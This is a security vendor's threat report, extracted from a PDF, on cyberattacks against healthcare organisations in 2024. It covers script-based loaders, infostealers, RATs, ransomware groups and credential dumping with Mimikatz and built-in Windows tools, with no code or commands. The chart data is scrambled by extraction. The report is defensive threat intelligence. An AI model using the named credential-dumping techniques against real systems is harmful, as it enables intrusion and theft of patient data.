2025 Cyber Threat Report: Threats Targeting the Healthcare Sector PDF Free Download
1 / 9/9
100%
2025 Cyber
Threat Report
Threats Targeting the
Healthcare Sector
2
Throughout 2024, threat actors were busier than ever, adapting quickly and deploying
more advanced tools and tactics across industries like technology, education,
government, and manufacturing. And healthcare was among the hardest hit.
Once reserved for targeting large corporations, sophisticated attack methods were
used against healthcare organizations of all sizes—from small regional providers to
massive hospital systems. The stakes have never been higher, as these attacks put
critical systems and patient data at risk.
Overview
Healthcare Faces Unique Risks
The healthcare sector has consistently been a prime target for threat actors, and
2024 proved no different. The combination of sensitive patient data, outdated
legacy systems, and fragmented IT environments makes healthcare especially
vulnerable to specific types of cyberattacks, including:
• Script-Based Exploits: The top threat in 2024, these scripts often serve as delivery
mechanisms for ransomware or data exfiltration, as they can effectively bypass
traditional security measures.
• Infostealers: As the name implies, they’re malicious programs designed to
extract sensitive info. With its wealth of protected health information (PHI) and
critical operational data, the healthcare sector has become a prime target
for these threats.
• Malware: Attackers deploy various types of malware, including fileless threats, to
disrupt operations or establish persistent network access.
Unfortunately, healthcare is a prime target for the most malicious hackers, drawn
to its wealth of sensitive data. Our latest findings reveal the tactics threat actors
are using to try to infiltrate organizations like yours. Here, we’re giving you the
information you need to understand these risks and stay ahead of emerging threats.
Attack Breakdown
3
4
Threat actors set their sights on a range of industries throughout 2024, but none so
much as healthcare and education.
We saw hackers focus most of their attacks on healthcare and educational facilities,
with these two industries making up 38% of all incidents. Cyberattacks on technology
companies, manufacturing, and government comprised almost a third of all
other incidents.
Industries Targeted
Figure 1: Industries targeted by percentage in 2024
Other 30%
Manufacturing
9%
Government 11%
12%
Technology
17% Healthcare
21% Education
Healthcare Is a
Top Target
5
Each industry faced its own distinct threats,
with the most common attack methods being
malicious scripts, remote access trojan (RAT)
deployments, and abuse of remote monitoring and
management (RMM) tools.
Healthcare environments were particularly
vulnerable to script-based attacks and exploitation
of legacy systems. Ransomware was also a
consistent threat across industries, healthcare
included. With cryptocurrency prices skyrocketing
in the latter part of the year, threat actors were
more brazen with their attacks, even against non-
enterprise environments. These findings mean that
healthcare organizations of all sizes need tailored
defenses and proactive measures to address their
unique vulnerabilities.
An example of persistent malware at
a healthcare diagnostic center
Figure 2: Threat frequency by industry in 2024
Persistence via Startup
Folder - executes .LNK file
Persistence via
Windows service
Infostealer Healthcare
Technology
Education
Government
Manufacturing
Other
19
7
8
4
464863
9
22
11 914
125
14 86
19 24 1518 19
14 13 912 12
63485
16 1314 1716 15
56578
136910 7
18 16 21 15 20
RAT
Ransomware
Malware
Hacking Tool
RMM Abuse
Malicious Script
Lateral Movement
Other
1007550250
Threats by Industry
6
Healthcare
Sector Threats
In 2024, the biggest risk for the healthcare
industry was malicious script executions.
These were primarily scripts being abused for
persistence, like JavaScript components of
malware, downloaders, and system analysis
components used before gathering additional
components. Because Huntress intercepted most
of these malicious scripts before completion, we
couldn’t positively associate many of them with
their appropriate malware family.
Most of these incidents appear to be related
to infostealers like Gootloader and the misuse
of PowerShell components for obfuscation or
anti-analysis. This includes techniques such as
modifying Windows Event Logs or conducting
searches. The most common target for these
scripts was modifying or querying Windows
Registry for both data exfiltration or as methods
for persistence like AutoRuns or COM object
modifications. After these, the second-most
frequent script goal was download components
originating from PowerShell or WScript
components. Many of these downloaders tried
getting other malware components, while a few
tried downloading packages installing RATs.
While there don’t appear to be any RAT tools
geared explicitly towards healthcare, many
look to use Java-based technology. Most
environments have removed the use of Java,
but the healthcare industry still depends on
Java applications and development for many
medical usage technologies and software suites.
Attackers know this and are taking advantage
of these overlooked areas, deploying JRat/
Adwind and STR RAT at higher frequencies than
other industries. JavaScript-based attacks are
also common in healthcare, where suspicious
JavaScript execution patterns and child process
rules were triggered in the majority of incidents.
Though most of these are generic malware
components, some appear to be related to
Gootloader or SOCGholish JavaScript loaders.
Threats Targeting
Healthcare
Figure 3: Healthcare threats by type in 2024
19%
7%
8%
16%
4%
9%
22
%
4%
11%
Infostealer
RAT
Ransomware
Malware
Hacking Tool
RMM Abuse
Malicious Script
Lateral Movement
Other
7
Attackers targeting healthcare can easily identify these environments, as more
than 38% of hands-on-keyboard (HOK) activity involved in these environments was
related to network or domain environment analysis or reconnaissance. This was the
initial HOK activity we saw in many cases, as attackers used infostealers or other
scripts to identify the domain. A human attacker would later access the infected
machine remotely. Lateral movement in healthcare, when not automated, was often
achieved with hacking tools, primarily Mimikatz or abusing known LOLBins (ntdsutil,
diskshadow, and rdrleakdiag were the most common) to dump memory to access
cached credentials.
Ransomware in the healthcare industry is slowly shifting to more data theft and
extortion than traditional decryption-based ransoms. We’re seeing this trend
elsewhere, as attackers are developing these tactics to defeat file encryption
protection—a key defense for thwarting traditional ransomware. Throughout 2024,
INC/Lynx and RansomHub were the primary groups that targeted hospitals and other
medical services. In many cases, these ransomware deliveries were used with threat
groups like Vanilla Tempest, who often partnered with INC to deploy their ransomware
on victims after they gained access and exfiltrated their primary targeted data.
Other 2%
Defense Evasion 6%
Exfiltration 7%
Credential Harvesting
14%
Persistence 11% 22% Lateral Movement
38%
Network Enumeration
Healthcare Hands-on-Keyboard Activity
Figure 4: Healthcare hands-on-keyboard activity in 2024
8
Conclusion
The healthcare sector is facing a growing wave of cyber threats. In 2024, attackers
used advanced techniques that were once aimed at large enterprises and
repurposed them to target healthcare organizations of all sizes. Given the reliance
on legacy systems and the high value of PHI, healthcare has become a prime target
for the most ruthless threat actors.
Key threats like malicious scripts, infostealers, and RATs highlight how attackers
exploit overlooked vulnerabilities, such as Java dependencies, outdated systems,
and fragmented IT environments. Additionally, the rise of data theft and extortion
as a replacement for traditional file encryption-based ransomware poses a
growing challenge.
To defend against rising cyber threats, healthcare organizations must adopt
proactive and layered security strategies. Essential measures include deploying
advanced endpoint monitoring to catch threats early and regularly patching systems
to reduce vulnerabilities. Equally important are comprehensive incident response
plans and ongoing employee training to minimize human error and ensure swift
recovery from attacks.
The TL;DR: Stay vigilant and resilient because cyber threats won’t stop evolving.
About Huntress
Founded in 2015 by former NSA cyber operators, Huntress protects over 3 million
endpoints and 1 million identities worldwide, elevating under-resourced IT and
security teams and empowering them with protection that works as hard as they
do. Powered by a 24/7 team of expert security analysts and researchers, our
enterprise-grade, fully owned technology is built for all businesses, not just the 1%
with big budgets.
With fully managed EDR, ITDR, and SIEM solutions and Security Awareness Training,
the Huntress platform helps end users quickly deploy and manage real-time
protection for endpoints, email, and employees, all from a single dashboard.
Huntress exists to level the cybersecurity playing field and elevate our community
through award-winning technology and world-class people. We’re ethical badasses
who love what we do: wrecking hackers and protecting businesses from real threats.
Learn More
Huntress Protects Healthcare
Malicious hackers are focused on healthcare, but you don’t have to face them
alone. Huntress combines purpose-built tech and people-powered security to
keep your organization—and your patients—safe.
